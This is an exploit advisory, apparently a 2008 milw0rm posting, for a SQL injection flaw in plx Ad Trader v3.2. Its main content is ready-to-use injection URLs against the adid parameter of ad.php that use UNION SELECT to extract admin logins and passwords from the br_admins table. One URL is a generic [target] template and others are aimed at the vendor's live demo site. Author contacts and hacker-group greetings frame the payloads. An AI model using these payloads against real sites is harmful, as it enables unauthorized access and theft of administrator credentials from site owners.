@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ plx Ad Trader v3.2 SQL Injection Vulnerability @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ Author: Hussin X @ @ @ @ Home : www.tryag.cc/cc @ @ @ @ email: darkangel_g85[at]Yahoo[DoT]com @ @ hussin.x[at]hotmail[DoT]com @ @ @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ HomE script : http://plxwebdev.com @ @ DeMo : http://plxwebdev.com/demos/plxadtrader @ @ @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ @ @ @ @ ExPloiT : www.[target].com/Script/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins-- L!VE DEMO : USER http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins-- PASSWORD http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins-- @ @ @ @@@@@@@@@@@@@@@@@@@@@@@( Greetz )@@@@@@@@@@@@@@@@@@@@@@@@ @ @ @ TrYaG.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR @ @ @ @ str0ke / FAHD /Iraqihack / Silic0n @ @@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@@@@@@@(and All IRAQIs)@@@@@@@@@@@@@@@@@@@@ # milw0rm.com [2008-07-01]